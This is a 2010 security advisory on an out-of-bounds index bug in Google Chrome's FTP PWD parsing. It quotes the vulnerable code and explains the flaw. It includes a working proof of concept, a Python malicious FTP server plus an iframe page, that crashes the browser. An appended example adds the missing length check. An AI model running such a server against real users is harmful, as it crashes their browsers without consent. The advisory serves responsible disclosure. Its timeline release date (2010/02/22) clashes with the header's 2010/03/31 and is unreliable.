-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory:             Google Chrome OOB Array Indexing Bug
Advisory ID:          TKADV2010-004
Revision:             1.0
Release Date:         2010/03/31
Last Modified:        2010/03/31
Date Reported:        2010/03/21
Author:               Tobias Klein (tk at trapkit.de)
Affected Software:    Google Chrome <= 4.1.249.1042 (Build 42199)
Remotely Exploitable: Yes
Locally Exploitable:  No
Vendor URL:           http://www.google.com/chrome/
Vendor Status:        Vendor has released an updated version

======================
Vulnerability Details:
======================

Google Chrome is vulnerable to an out-of-bounds array indexing bug,
caused by the improper handling of FTP PWD command server responses. By
persuading a victim to visit a specially-crafted web site containing an
iframe pointing to a malicious FTP server, a remote attacker could
exploit this bug and cause the browser to crash. This bug affects the
trusted browser kernel (the privileged supervisor of the activities of
the sandboxed processes).

Tested Chrome version (Microsoft Windows):

Google Chrome  4.1.249.1042 (Build 42199)
WebKit         532.5
V8             1.3.18.22
User Agent     Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1042 Safari/532.5

==================
Technical Details:
==================

File: net\ftp\ftp_network_transaction.cc

[..]
int FtpNetworkTransaction::ProcessResponsePWD(const FtpCtrlResponse& response) {
  switch (GetErrorClass(response.status_code)) {
    case ERROR_CLASS_INITIATED:
      return Stop(ERR_INVALID_RESPONSE);
    case ERROR_CLASS_OK: {
      // The info we look for should be on the first line.
[1]   std::string line = response.lines[0];
      if (line.empty())
        return Stop(ERR_INVALID_RESPONSE);
[2]   std::string::size_type quote_pos = line.find('"');
      if (quote_pos != std::string::npos) {
[3]     line = line.substr(quote_pos + 1);
[4]     quote_pos = line.find('"');
        if (quote_pos == std::string::npos)
          return Stop(ERR_INVALID_RESPONSE);
[5]     line = line.substr(0, quote_pos);
      }
      if (system_type_ == SYSTEM_TYPE_VMS)
        line = FtpUtil::VMSPathToUnix(line);
[6]   if (line[line.length() - 1] == '/')
        line.erase(line.length() - 1);
      current_remote_directory_ = line;
      next_state_ = STATE_CTRL_WRITE_TYPE;
      break;
    }
    case ERROR_CLASS_INFO_NEEDED:
      return Stop(ERR_INVALID_RESPONSE);
    case ERROR_CLASS_TRANSIENT_ERROR:
      return Stop(ERR_FAILED);
    case ERROR_CLASS_PERMANENT_ERROR:
      return Stop(ERR_FAILED);
    default:
      NOTREACHED();
      return Stop(ERR_UNEXPECTED);
  }
  return OK;
}
[..]

[1] The string 'line' holds the first line of the FTP server response.
[2] Search for the first double quote (") in the response.
[3] Point one byte after the first double quote.
[4] Find the next double quote.
[5] Extract the substring from the current position up to the second double quote.
[6] Check whether the last character of the extracted substring is a '/' (and strip it if so).

If the FTP server response consists of two double quotes following
directly after each other, the code at [5] produces a substring with a
length of zero bytes. The index computed at [6], line[line.length() - 1],
then becomes an out-of-bounds array index (line[0xffffffff]), which
results in an application crash.

=================
Proof of Concept:
=================

Malicious FTP server:

K:\BUGS\CHROME>type poc.py
from socket import *
from struct import pack
from time import sleep

host = "0.0.0.0"
port = 21

s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)

print "\n[+] Google Chrome (4.1.249.1042) Denial of Service poc"
print "[+] Listening on port %d ..." % port

cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]

buffer = "220 Google Chrome (4.1.249.1042) Denial of Service poc"
buffer += "\r\n"
cl.send(buffer)
cl.recv(128)

buffer = "331 Password required for anonymous."
buffer += "\r\n"
cl.send(buffer)
cl.recv(128)

buffer = "230 User anonymous logged in."
buffer += "\r\n"
cl.send(buffer)
cl.recv(128)

buffer = "215 UNIX Type: bib"
buffer += "\r\n"
cl.send(buffer)
cl.recv(128)

buffer = "257 \"\""
buffer += "\r\n"
cl.send(buffer)
print "[+] Sending buffer: OK\n"

sleep(1)
cl.close()
s.close()
- - - - - ---

Start the poc server:

K:\BUGS\CHROME>python poc.py

[+] Google Chrome (4.1.249.1042) Denial of Service poc
[+] Listening on port 21 ...

Open the following sample HTML page in Chrome:

- - - - - ---
<html>
<body>
<iframe name="POC" src="ftp://127.0.0.1"></iframe>
</body>
</html>
- - - - - ---

=========
Solution:
=========

Update to Google Chrome >= 4.1.249.1045.

====================
Disclosure Timeline:
====================

Format: year/month/day

2010/03/21 - Chromium maintainers notified
2010/03/22 - Patch developed by Chromium maintainers
2010/03/30 - Fixed version of Google Chrome is available
2010/02/22 - Release date of this security advisory

========
Credits:
========

Vulnerability found and advisory written by Tobias Klein.

===========
References:
===========

[REF1] http://googlechromereleases.blogspot.com/2010/03/stable-update-disable-translate.html
[REF2] http://bugs.chromium.org/38845
[REF3] http://www.trapkit.de/advisories/TKADV2010-004.txt

========
Changes:
========

Revision 0.1 - Initial draft release to the vendor
Revision 1.0 - Public release

===========
Disclaimer:
===========

The information within this advisory may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are no warranties, implied or express, with regard to this
information. In no event shall the author be liable for any direct or
indirect damages whatsoever arising out of or in connection with the
use or spread of this information. Any use of this information is at
the user's own risk.

==================
PGP Signature Key:
==================

http://www.trapkit.de/advisories/tk-advisories-signature-key.asc

Copyright 2010 Tobias Klein. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: PGP
Charset: utf-8

wj8DBQFLs6gPkXxgcAIbhEERAlH6AKD+UgqYNZpBD40+o7Yl8HjdsaVM1QCffMKa
pqw8f2DGxim/+N1k+jCqbcQ=
=mHHh
-----END PGP SIGNATURE-----
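Returning to the Technical Details section: the following is an added example, not code from the advisory or from Chromium, showing the same PWD-reply path extraction with the length check that step [6] lacked. The function name ParsePwdPath(), the sample 257 replies and the rule that a bare "/" (root) is kept rather than stripped are this example's own assumptions, not documented Chromium behaviour.

```cpp
#include <string>
#include <iostream>

// Extracts the quoted path from the first line of an FTP PWD (257) reply.
// Returns false wherever the original code returned Stop(ERR_INVALID_RESPONSE),
// and additionally for the empty-path case that the vulnerable code missed.
bool ParsePwdPath(const std::string& first_line, std::string* path) {
    std::string line = first_line;
    if (line.empty())
        return false;                         // nothing to parse

    std::string::size_type quote_pos = line.find('"');
    if (quote_pos != std::string::npos) {
        line = line.substr(quote_pos + 1);    // skip the opening quote
        quote_pos = line.find('"');
        if (quote_pos == std::string::npos)
            return false;                     // unterminated quote
        line = line.substr(0, quote_pos);     // text between the quotes
    }

    // The missing check: a reply such as `257 ""` leaves `line` empty here.
    // Without it, line[line.length() - 1] evaluates line[SIZE_MAX], the
    // out-of-bounds index the advisory describes.
    if (line.empty())
        return false;

    // Strip one trailing slash, but keep a bare "/" (root) intact.
    // Keeping root is this example's choice (assumption), not Chromium's.
    if (line.length() > 1 && line[line.length() - 1] == '/')
        line.erase(line.length() - 1);

    *path = line;
    return true;
}

int main() {
    // Constructed sample replies: well-formed, empty path, root, unterminated.
    const char* samples[] = { "257 \"/pub/incoming/\" is current directory.",
                              "257 \"\"", "257 \"/\"", "257 \"/unterminated" };
    for (const char* s : samples) {
        std::string path;
        bool ok = ParsePwdPath(s, &path);
        std::cout << s << " -> "
                  << (ok ? "path=" + path : std::string("ERR_INVALID_RESPONSE"))
                  << "\n";
    }
    return 0;
}
```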